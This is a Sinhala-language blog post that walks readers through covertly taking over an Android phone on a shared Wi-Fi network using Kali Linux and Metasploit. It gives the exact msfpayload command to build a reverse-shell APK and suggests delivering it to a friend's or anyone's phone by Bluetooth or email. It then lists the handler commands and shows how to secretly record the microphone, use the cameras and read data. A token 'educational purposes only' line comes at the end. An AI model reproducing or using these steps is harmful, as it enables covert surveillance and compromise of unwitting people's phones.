මේ දවස් වල ඔක්කොලගේම අතේ smart phone නේ ඉතින්... අනික යන යන තැන Wifi.. Office එකෙයි ගෙදරයි හැම තැනම.. Phone කොයිවෙල්ත් Connected.. අද කියල දෙන විදියෙන් පුළුවන් යාලුවගෙ හරි තමන්ගේ හරි කාගේ හරි Phone එකක් සම්පූර්නයෙන්ම Access කරන්න.. Camera දෙකම පාවිච්චි කරලා වටේ වෙන්නේ මොනාද බලන්න පුළුවන්, Mic එක use කරලා අහන් ඉන්න පුළුවන්, ෆොනේ එකේ Data access කරන්නද ඕනේ එකක් කර ගත්තෙකි..
මේ method Wifi නැතිව DATA on කරන ඉන්න වෙලාවට උනත් පාවිච්චි කරන්න පුළුවන් පොඩි පොඩි වෙනස් කම් කීපයකින්.. හැබැයි මේ Post එකන් නම් කියන්නේ Wifi එක ඇතුලෙදි (LAN එක ඇතුලෙදි)කරගන්න විදිය..
හරි අපි බලමු කරගන්නේ කොහොමද කියලා.. ඔන්න ඉතින් කාලෙකට පස්සේ ඇත්තටම කිව්වොත් අවුරුදු 2කට පස්සේ තමා Post එකක් දාන්න හිතුනේ. බ්ලොග් එකෙත් පොඩි පොඩි වෙනස් කම් කීපයක් කරා.. මතක ඇති අපි කලිනුත් කතාකරලා තියෙනවා Backtrack, Kali Linux ගැන එහෙම.. මන් මෙකෙදි use කරන්නේ Kali Linux OS එක.. ළග නැත්තන්
මෙතැන Click කරලා
Download කරගන්න පුළුවන්.. මෙක Live CD එකක් විදියට use කරන්න පුළුවන් නිසා OS ගහ ගහ ඉන්න ඕනේ නැ.. නැත්තන් මන් කලින් කියලදිල තියෙනවා Virtual PC එකක් හදන හැටි.. Kali Linux එක run උනාට පස්සේ එන්නේ මේ වගේ environment එකක්...
එකේ පෙන්නලා තියෙන තැන click කරලා Terminal එක Open කරගන්න..
එකෙදි ifconfig කියන command එක use කරලා තමන්ගේ internal ip එක බලාගන්න..
තව Terminal එකක් open කරගෙන පහල command එක type කරන්න..
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R > install.apk
මේක හරියටම type කරලා තියෙන්න ඕනා.. LHOST එකේ 192.168.1.101 වෙනුවට අර කලින් බලාගත්ත තමන්ගේ ip එක add කරන්න.. දෙපාරක් check කරන්න Enter කරන්න කලින්... දැන් apk file එක ready.. කස්ටිය ඔය වගේ hack කරන software දාගෙන හොයනවා නේ.. ඔන්න දැන් අපිම එකක් හදා ගත්ත..
හරි දැන් Home folder එකේ ඇති apk file එක...
ඔය file එක upload කරලා access කරන්න ඕනේ කරන phone එකට download කරල install කරන්න.. නැත්තන් apk එක bluetooth කරන්න පුළුවන් නැත්තන් mail එකක් දාන්න.. කැමති විදියකට.. එකේදී unknown sources tic එක දාන්න අමතක කරන්න එපා..
ඊළගට තව terminal එකක් open කරගෙන type කරන්න
msfconsole කියලා.. ඊට පස්සේ Enter කරන්න.. open වෙන්න ටික වෙලාවක් යයි.. එන්නේ මේ වගේ එකක්..
ඔන්න ඔය එන තැන ඉදන් තමා වැඩ පටන් ගන්නේ.. කලින් සැරේ වගේමයි.. spelling හරියට type කරන්න.. spaces හරියට තියන්න.. පහල තියෙන එක type කරලා enter කරන්න..
use exploit/multi/handler
ඊළගට
set payload android/meterpreter/reverse_tcp type කරලා enter කරන්න..
ඊට පස්සේ
set LHOST 192.168.1.101 type කරලා enter කරන්න අර type කරපු ip එක ඔයාලගේ ip එක වෙන්න ඕන අර apk එක හදන අවස්ථාවේදී දුන්න එක..
ඊළගට
exploit කියල type කරලා enter කරන්න.. එතකොට තියෙන්නේ මේ වගේ...
දැන් අර apk එක run වෙනවා නම් හරි.. එ කියන්නේ අර user දැන් wifi එකට connect වෙලා ඉන්න ඕන..
දැන් මේ වගේ Lines දෙකක් එනවා කියන්නේ වැඩේ ගොඩ.. දැන් අර phone එකේ ඕන දෙයක් ඔයාලට කරන්න පුළුවන්.. අපි බලමු run කරන්න පුළුවන් commands ටිකක්.. ඔතන
help කියල ගැහුවා නම් කරන්න පුළුවන් ඔක්කොම ටික පෙන්නනවා..
අපි උදාහරණයකට ගමු record_mic කියන එක.. ඔයාලා command එක use කරන්න දන්නේ නැත්තන් කරන්න තියෙන්න
record_mic -h කියලා type කරලා enter කරන එක එතකොට පෙන්නනවා එක use කරන විදිය..
මේ වගේ ඔයාලට command එක හදාගන්න පුළුවන් දැන්...
record_mic -d 30 -f -p
ඔන්න ඔය වගේ.. -d එකන් කියවෙන්නේ කාලය තප්පර වලින් මේකෙදි 30ක් දීල තියෙනවා.. -f කියන්නේ path එක එන විදිය ඕනේ නම් වෙනස් කරගන්න පුළුවන්.. -p වලින් කියවෙන්නේ record එක අවසානයේදී එක play වෙනවා කියන එක..
ඔන්න ඔය වගේ ඔයාලට අනිත් කෙනාගේ phone එකේ ඕනේ තරම් දේවල් කරන්න පුළුවන් එයාට දැනෙන්නේ නැති වෙන්න..
කාලෙකින් ලියපූ පලවෙනි post එක හිතුවට වඩා දිග උනා.. ඉස්සරහට නම් දිගටම post දාන බලාපොරොත්තු වෙනවා.. මොනා හරී අවුලක් අවොත් comment කරන්න.. මේක
Educational Purposes only හරිය.. කැත වැඩ කරන්න පාවිච්චි කරන්න එපා.. LAN වලට වගේම WAN වලටත් මෙක පොඩි පොඩි වෙනස් කම් කීපයකින් පාවිච්චි කරන්න පුළුවන්.. Try කරලා බලන්න.. ඉස්සරහට computer එකක් මේ විදියට access කරන විදිය කියල දෙන්නම්...
එහෙනම් මේ Lesson එකෙන් ඔයාල මොන හරි දෙයක් ගත්ත නම්, Like එකක් Comment එකක් දාලම යන්න...
